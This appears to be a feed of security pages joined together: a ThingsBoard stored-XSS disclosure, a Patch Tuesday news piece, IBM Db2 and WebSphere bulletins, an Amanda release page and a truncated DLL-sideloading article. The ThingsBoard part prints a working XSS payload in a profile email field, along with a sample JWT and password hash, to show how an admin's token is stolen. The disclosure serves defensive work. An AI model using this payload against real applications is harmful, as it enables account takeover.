Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs.

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs.

Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform.

According to Thingsboard's documentation (https://thingsboard.io/docs/pe/user-guide/rbac/), on the community edition, _"a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant"._ Each tenant has several customers and as per documentation - _"Customer user is able to view dashboards and control devices that are assigned to a specific customer."_  If a customer is able to take over the account of a tenant admin, that customer would be able to target all other customers belonging to the same tenant.

A stored cross-site scripting vulnerability on Thingsboard lets a customer take over the account of a tenant admin. A customer has view-only privilege for most functionalities. However, a customer can edit their own profile, and insert an XSS payload in the "email" parameter.  This XSS payload gets injected in the audit logs page, and when a tenant admin views the audit logs, the customer gets the tenant admin's authentication token (stored in LocalStorage).

Below is the underlying HTTP POST request in which the customer inserts an XSS payload in the email parameter, followed by the HTTP response (providing the complete request/response without masking any sensitive field, as the information corresponds to default accounts on a local installation of Thingsboard community edition).

**HTTP Request:**

POST /api/user?sendActivationMail=false HTTP/1.1

Host: localhost:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0

Accept: application/json, text/plain, \*/\*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json

X-Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJjdXN0b21lckB0aGluZ3Nib2FyZC5vcmciLCJ1c2VySWQiOiJkN2VkYjliMC0zMWViLTExZWQtYmVhOS00M2MzY2JjODFhNjMiLCJzY29wZXMiOlsiQ1VTVE9NRVJfVVNFUiJdLCJpc3MiOiJ0aGluZ3Nib2FyZC5pbyIsImlhdCI6MTY2MzA5NTI4OCwiZXhwIjoxNjYzMTA0Mjg4LCJmaXJzdE5hbWUiOiJ0ZXN0MDFzIiwibGFzdE5hbWUiOiJoa2Jja2EiLCJlbmFibGVkIjp0cnVlLCJpc1B1YmxpYyI6ZmFsc2UsInRlbmFudElkIjoiZDc0ZWUxYTAtMzFlYi0xMWVkLWJlYTktNDNjM2NiYzgxYTYzIiwiY3VzdG9tZXJJZCI6ImQ3ZGZkNzAwLTMxZWItMTFlZC1iZWE5LTQzYzNjYmM4MWE2MyJ9.Gg-KmkQn7Bv2-in8CLEVt8VKtTHTDxUpOfbzIouaND5gYP74JnUC5tOwPR-Ebm4xpeVzG9ooYOS3KIYRFuKBsg

Content-Length: 758

Origin: http://localhost:8080

Connection: close

Referer: http://localhost:8080/profile

{"id":{"entityType":"USER","id":"d7edb9b0-31eb-11ed-bea9-43c3cbc81a63"},"createdTime":1662912452811,"additionalInfo":{"userPasswordHistory":{"1662912452941":"$2a$10$raEXkVa09GJaH3UnbFIKMeyQTypYThWhwpe0pHEMuZ3ZX80VIrcWu"},"failedLoginAttempts":0,"lastLoginTs":1663095288216,"userCredentialsEnabled":true,"lang":"en\_US","homeDashboardHideToolbar":true},"tenantId":{"entityType":"TENANT","id":"d74ee1a0-31eb-11ed-bea9-43c3cbc81a63"},"customerId":{"entityType":"CUSTOMER","id":"d7dfd700-31eb-11ed-bea9-43c3cbc81a63"},**"email":"customer@thingsboard.org<img src=# onerror=alert(localStorage.getItem('jwt\_token'))>"**,"authority":"CUSTOMER\_USER","firstName":"test","lastName":"test","name":"customer@thingsboard.org","language":"en\_US","homeDashboardHideToolbar":true}

**HTTP Response:**

HTTP/1.1 400 

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Pragma: no-cache

Expires: 0

Content-Type: application/json;charset=ISO-8859-1

Content-Length: 202

Date: Tue, 13 Sep 2022 18:56:57 GMT

Connection: close

{"status":400,"message":"Invalid email address format 'customer@thingsboard.org<img src=# onerror=alert(localStorage.getItem('jwt\_token'))>'!","errorCode":31,"timestamp":"2022-09-13T18:56:57.476+00:00"}

We can confirm that the user who issued this request is indeed a customer by decoding the JWT token used in the request:

**JWT:**

eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJjdXN0b21lckB0aGluZ3Nib2FyZC5vcmciLCJ1c2VySWQiOiJkN2VkYjliMC0zMWViLTExZWQtYmVhOS00M2MzY2JjODFhNjMiLCJzY29wZXMiOlsiQ1VTVE9NRVJfVVNFUiJdLCJpc3MiOiJ0aGluZ3Nib2FyZC5pbyIsImlhdCI6MTY2MzA5NTI4OCwiZXhwIjoxNjYzMTA0Mjg4LCJmaXJzdE5hbWUiOiJ0ZXN0MDFzIiwibGFzdE5hbWUiOiJoa2Jja2EiLCJlbmFibGVkIjp0cnVlLCJpc1B1YmxpYyI6ZmFsc2UsInRlbmFudElkIjoiZDc0ZWUxYTAtMzFlYi0xMWVkLWJlYTktNDNjM2NiYzgxYTYzIiwiY3VzdG9tZXJJZCI6ImQ3ZGZkNzAwLTMxZWItMTFlZC1iZWE5LTQzYzNjYmM4MWE2MyJ9.Gg-KmkQn7Bv2-in8CLEVt8VKtTHTDxUpOfbzIouaND5gYP74JnUC5tOwPR-Ebm4xpeVzG9ooYOS3KIYRFuKBsg

**Decoded JWT payload** (from jwt.io):

{

  "sub": "customer@thingsboard.org",

  "userId": "d7edb9b0-31eb-11ed-bea9-43c3cbc81a63",

  "scopes": \[

    "CUSTOMER\_USER"

  \],

  "iss": "thingsboard.io",

  "iat": 1663095288,

  "exp": 1663104288,

  "firstName": "test01s",

  "lastName": "hkbcka",

  "enabled": true,

  "isPublic": false,

  "tenantId": "d74ee1a0-31eb-11ed-bea9-43c3cbc81a63",

  "customerId": "d7dfd700-31eb-11ed-bea9-43c3cbc81a63"

}

When a tenant admin views the audit logs, the payload injected by the customer (i.e., **<img src=# onerror=alert(localStorage.getItem('jwt\_token'))>** executes on the browser of the tenant admin, as shown below.

**References:**

CVE-2022-31861: CVE-ID: CVE-2022-31861

In Microsoft's lightest Patch Tuesday update of the year so far, several security vulnerabilities stand out as must-patch, researchers warn.

Microsoft addressed a pair of important-rated zero-day bugs in its September Patch Tuesday update, including a local privilege-escalation (LPE) that's being actively exploited in the wild. To boot, it disclosed three separate critical vulnerabilities that could be used for worming attacks.

The patches are part of a cache of just 64 fixed vulnerabilities from Microsoft this week, the fewest for any month this year (and almost a 50% decrease from August). The disclosed bugs affect Microsoft Windows and Windows Components; Azure and Azure Arc; .NET, Visual Studio, .NET Framework; Microsoft Edge (Chromium-based); Office and Office Components; Windows Defender; and Linux Kernel.

**A Pair of Zero-Day Vulnerabilities**

The actively exploited vulnerability (CVE-2022-37969, with a CVSS score of 7.8) exists in the Windows Common Log File System Driver, which is a general-purpose logging subsystem first introduced in Windows 2003 R2 OS and which has shipped with all later versions. An exploit for the bug allows an attacker with initial system access to elevate their privilege to SYSTEM privileges on a zero-click basis.

"No other technical details are available, but since the vulnerability has low complexity and requires no user interaction, an exploit will likely soon be in the arsenal of both white hats and black hats," Mike Walters, cybersecurity executive and co-founder of Action1, wrote in an analysis provided to Dark Reading. "It’s recommended that you deploy the patch as soon as possible."

Dustin Childs of Trend Micro's Zero Day Initiative (ZDI) noted that it's likely being deployed in a tidy exploit chain package.

"Bugs of this nature are often wrapped into some form of social engineering attack, such as convincing someone to open a file or click a link," he wrote in his Patch Tuesday blog post. "Once they do, additional code executes with elevated privileges to take over a system."

This is one for everyone to patch quickly, he stressed: "Usually, we get little information on how widespread an exploit may be used. However, Microsoft credits four different agencies reporting this bug, so it’s likely beyond just targeted attacks."

The other zero-day bug (CVE-2022-23960) exists in Windows 11 for ARM64-based Systems. Microsoft didn't provide any further details, and it was not assigned a CVSS score, but Bharat Jogi, director of vulnerability and threat research at Qualys, offered context in an emailed comment, noting that it's a processor-based speculative execution issue of the sort made infamous with the Spectre and Meltdown attacks. A successful exploit would give attackers access to sensitive information.

"This \[is\] a fix for a vulnerability known as Spectre-BHB that affects ARM64-based systems," he noted. "This vulnerability is a variant of Spectre v2 which has reinvented itself on numerous occasions and has affected various processor architectures since its discovery in 2017."

He added, "This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware, and in some cases, a recompilation of applications and hardening."

**Five Critical Bugs for September**

As mentioned, three of the critical-rated bugs are wormable — i.e., could be used to spread infections from machine to machine with no user interaction.

The most concerning of these is likely CVE-2022-34718, researchers said, which can be found in Windows TCP/IP. It allows a remote, unauthenticated attacker to execute code with elevated privileges on affected systems without user interaction; and it can be exploited by sending a specially crafted IPv6 packet to a Windows node where IPsec is enabled.

"That officially puts it into the 'wormable' category and earns it a CVSS rating of 9.8," Childs said. "Definitely test and deploy this update quickly."

It should be noted that it only affects systems with IPv6 enabled and IPsec configured, but this is a common setup.

"If a system doesn’t need the IPsec service, disable it as soon as possible," said Action1's Walters. "This vulnerability can be exploited in supply chain attacks where contractor and customer networks are connected by an IPsec tunnel. If you have IPsec tunnels in your Windows infrastructure, this update is a must-have."

The other two wormable bugs, CVE-2022-34722 and CVE-2022-34721, are both found in Windows Internet Key Exchange (IKE) Protocol Extensions. They both allow RCE by sending a specially crafted IP packet to a target machine that is running Windows and has IPsec enabled, and both carry a CVSS score of 9.8.

Walters noted that the vulnerability impacts only IKEv1 and not IKEv2. "However, all Windows Servers are affected because they accept both V1 and V2 packets," he wrote. "There is no exploit or PoC detected in the wild yet; however, installing the fix is highly advisable."

The final two critical bugs (CVE-2022-34700 and CVE-2022-35805) both exist in Dynamics 365 (On-Premises), and "could allow an authenticated user to perform SQL injection attacks and execute commands as db\_owner within their Dynamics 356 database," Childs explained. They have a CVSS score of 8.8.

**Other Vulnerabilities of Note**

As for noncritical flaws to pay attention to first this month, Childs also flagged a denial-of-service bug in Windows DNS server (CVE-2022-34724, CVSS score of 7.5), which can be exploited by remote, unauthenticated attacker to knock out DNS service used to connect to cloud resources and websites.

While there's no chance of code execution, the bug should be treated as critical, he added. "With so many resources in the cloud, a loss of DNS pointing the way to those resources could be catastrophic for many enterprises," Childs said.

Rapid7's Patch Tuesday analysis this month, sent via email, also noted that SharePoint administrators should also be aware of four separate RCE bugs, all rated important (CVE-2022-35823, CVE-2022-37961, CVE-2022-38008, and CVE-2022-38009).

And there's a large swath of RCE bugs affecting OLE DB Provider for SQL Server and the Microsoft ODBC Driver (CVE-2022-34731; CVE-2022-34733, CVE-2022-35834, CVE-2022-35835, CVE-2022-35836, and CVE-2022-35840).

"These require some social engineering to exploit, by convincing a user to either connect to a malicious SQL Server or open a maliciously crafted .mdb (Access) file," Greg Wiseman, product manager at Rapid7, explained in the analysis.

Overall, administrators should have an easier time parsing the lighter patch load this month, but ZDI's Childs noted that the smaller collection is in line with the volume of patches from previous September releases. Qualys' Jogi also pointed out that while September's Patch Tuesday clocks in on the lighter side, Microsoft hit a milestone of fixing the 1,000th CVE of the year, meaning the software giant is "likely on track to surpass 2021, which patched 1,200 CVEs in total."

Microsoft Quashes Actively Exploited Zero-Day, Wormable Critical Bugs

IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to an information disclosure in some scenarios due to unauthorized access caused by improper privilege management when CREATE OR REPLACE command is used. IBM X-Force ID: 225979.

  

**Summary**

IBM® Db2® is vulnerable to an information disclosure in some scenarios due to unauthorized access caused by improper privilege management when CREATE OR REPLACE command is used.

**Vulnerability Details**

**CVEID:**   CVE-2022-22483  
**DESCRIPTION:**   IBM Db2 is vulnerable to an information disclosure in some scenarios due to unauthorized access caused by improper privilege management when CREATE OR REPLACE command is used.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225979 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

All fix pack levels of IBM Db2 V9.7, V10.1, V10.5, V11.1, and V11.5 server editions on all platforms are affected. 

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V9.7, V10.1, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V9.7 FP11, V10.1 FP6, V10.5 FP11, V11.1.4 FP7, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V9.7

TBD

IT40893

Special Build for V9.7 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

Please note: new Security fixes for V9.7 will no longer be provided after December 31, 2022 as it has reached end of support.

V10.1

TBD

IT40892

Special Build for V10.1 FP6:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

Please note: new Security fixes for V10.1 will no longer be provided after December 31, 2022 as it has reached end of support.

V10.5

TBD

IT40880

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86  
Inspur

V11.1

TBD

IT40781

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

IT40879

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Dijing Wang of BEIJING DBSEC TECHNOLOGY CO., LTD.

**Change History**

12 Sep 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"DB2 for Linux- UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"}\],"Version":"9.7, 10.1, 10.5, 11.1, 11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-22483: IBM® Db2® is vulnerable to an information disclosure in some scenarios due to unauthorized access caused by improper privilege management when CREATE OR REPLACE command is used. (CVE-2022-22483)

IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service after entering a malformed SQL statement into the Db2expln tool. IBM X-Force ID: 230823.

  

**Summary**

IBM® Db2® is vulnerable to a denial of service after entering a specially crafted malformed SQL statement into the db2expln tool.

**Vulnerability Details**

**CVEID:**   CVE-2022-35637  
**DESCRIPTION:**   IBM DbB2 for Linux, UNIX and Windows (includes DB2 Connect Server) is vulnerable to a denial of service after entering a malformed SQL statement into the Db2expln tool.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/230823 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

All fix pack levels of IBM Db2 V10.5, V11.1, and V11.5 server editions on all platforms are affected.  

IBM Db2 versions 9.7 and 10.1 are not affected.

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V10.5 FP11, V11.1.4 FP7, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V10.5

TBD

IT41339

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86  
Inspur

V11.1

TBD

IT41338

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

IT41312

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

12 Sep 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"DB2 for Linux- UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF027","label":"Solaris"},{"code":"PF010","label":"HP-UX"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"10.5, 11.1, 11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-35637: IBM® Db2® is vulnerable to a denial of service after entering a specially crafted malformed SQL statement into the db2expln tool. (CVE-2022-35637)

IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 229714.

**Security Bulletin**

  

**Summary**

IBM WebSphere Application Server is vulnerable to cross-site scripting in the Admin Console. This has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-34336  
**DESCRIPTION:**   IBM WebSphere Application Server is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/229714 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server

9.0

IBM WebSphere Application Server

8.5

IBM WebSphere Application Server

8.0

IBM WebSphere Application Server

7.0

**Remediation/Fixes**

 IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH47531.

**For IBM WebSphere Application Server traditional:**

**For V9.0.0.0 through 9.0.5.13:**  
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix  PH47531  
\--OR--  
· Apply Fix Pack 9.0.5.14 or later (targeted availability 4Q2022). 

**For V8.5.0.0 through 8.5.5.22:**  
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH47531  
\--OR--  
· Apply Fix Pack 8.5.5.23 or later (targeted availability 1Q2023). 

**For V8.0.0.0 through 8.0.0.15:**  
· Upgrade to 8.0.0.15 and then apply Interim Fix PH47531  
 

**For V7.0.0.0 through 7.0.0.45:**  
· Upgrade to 7.0.0.45 and  then apply Interim Fix PH47531  
 

Additional interim fixes may be available and linked off the interim fix download page.

_IBM WebSphere Application Server V7.0 and V8.0 are no longer in full support; IBM recommends upgrading to a fixed, supported version/release/platform of the product._

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

12 Sep 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"}\],"Version":"7.0, 8.0, 8.5, 9.0","Edition":"Advanced,Base,Developer,Enterprise,Express,Network Deployment,Single Server","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-34336: IBM WebSphere Application Server is vulnerable to cross-site scripting in the Admin Console (CVE-2022-34336)

In Amanda 3.5.1, an information leak vulnerability was found in the calcsize SUID binary. An attacker can abuse this vulnerability to know if a directory exists or not anywhere in the fs. The binary will use `opendir()` as root directly without checking the path, letting the attacker provide an arbitrary path.

**What is Amanda?**

AMANDA, the Advanced Maryland Automatic Network Disk Archiver, is a backup solution that allows the IT administrator to set up a single master backup server to back up multiple hosts over network to tape drives/changers or disks or optical media. Amanda uses native utilities and formats (e.g. dump and/or GNU tar) and can back up a large number of servers and workstations running multiple versions of Linux or Unix. Amanda uses a native Windows client to back up Microsoft Windows desktops and servers.

The **latest stable version of Amanda**, 3.5.2 was released on 20th July 2022. As part of this release, we have addressed unintentional deletions of tape data in the backup environment. Your existing data on tapes will be safe and will not get replaced by your new backup set.

The most recent **stable release** is version 3.5.1, released on December 1, 2017.

The latest **release** is the 3.4.x series is 3.4,5, released on June 8, 2017. This is a bugfix release for 3.4.4.  

The latest **release** is the 3.3.x series is 3.3.9, released on February 10, 2016. It is a security fix. The amanda user was allowed to run any code as root, upgrade is not required if you trust the amanda user.

The latest **release** in the 3.2.x series is 3.2.3, released on May 9, 2011. It is a bug fix release for version 3.2.2.

The latest **release** in the 3.1.x series is 3.1.3, released on October 5, 2010. It is a security release for version 3.1.2.

Amanda-3.1.2 has a known security vulnerability, and all users should upgrade to Amanda-3.1.3 as soon as possible. See the security alert.

**Download here!** (README) | Learn more about Amanda's 3.5.2 release in our blog

**Release Notes for 3.5.2:**

The 3.5.2 version of Amanda will prevent unintentional deletions of data on tapes. With this release, you can stay assured that your data on tapes is safe, irrespective of the value set on the retention period.

**Enhancement**

Prevent auto-label from erasing tapes - Auto-label is disabled from claiming non-Amanda and other configuration labels by default. This change will prevent rewriting your existing tape media with new backup set.

**Release Notes for 3.5.1:**

*   compilation on Solaris
*   Do not check all 'r' bit on suid binary
*   Fix parsing of configuration override (-o)

*   can unset some setting

*   client code will not fail if shared memory is not available
*   amreport

*   lot of improvement

*   allow '\*' for a datestamp wildcard
*   amgetconf

*   print an empty string if a parameter is not set instead of 'no such parameter'

*   amdump

*   new --no-dump, --no-flush and --no-vault argument

*   amstatus fix
*   lock holding disk to protect multiple parallel access

**Release Notes for 3.5:**

*   Use different thread to connect to different client
*   amservice, amcheck, planner, dumper are no longer suid root
*   ambind

*   new suid program to bind to a privileged port

*   amanda-security.conf

*   new tcp\_port\_range, range of privileged tcp port
*   new udp\_port\_range, range of privileged udp port

*   S3 device

*   openstack keystone v3 support

*   device-property STORAGE-API must be set to SWIFT-3
*   new PROJECT-NAME device-property
*   new DOMAIN-NAME device-property

*   amfetchdump

*   rename --directory argument to --target

*   ampgsql

*   new --incremental property
*   new --remove-full-wal property
*   new --remove-incremental-wal property

  
*   fix planner looping
*   fix overflow in S3 device
*   fix compilation on OpenBSD
*   fix race in amarchive reader
*   fix amflush (flush date selected by user)
*   fix local auth, use getaddrinfo to find if the host is local
*   fix dumper cancelling the shm\_ring with a STRANGE result
*   fix chunker hang
*   Improve taperscan with chg-single and interactivity

**View more available versions**

**Amanda Web Pages**

*   Amanda wiki
*   **Backup & Recovery** (O'Reilly 2007) has a chapter dedicated to Amanda.

  
_Last updated: $Date: 2017-09-28 21:37:44 $_

CVE-2022-37703: Open Source Backup for Linux, Windows, UNIX and OS X

Cyber spies are using legitimate apps for DLL sideloading, deploying an updated range of malware, including the new "Logdatter" info-stealer.

A threat group previously associated with the notorious ShadowPad remote access Trojan (RAT) has been observed using old and outdated versions of popular software packages to load malware on systems belonging to multiple target government and defense organizations in Asia.

The reason for using outdated versions of legitimate software is because they allow the attackers to use a well-known method called dynamic link library (DLL) sideloading to execute their malicious payloads on a target system. Most current versions of the same products protect against the attack vector, which basically involves adversaries disguising a malicious DLL file as a legitimate one and putting it in a directory where the application would automatically load and run the file.

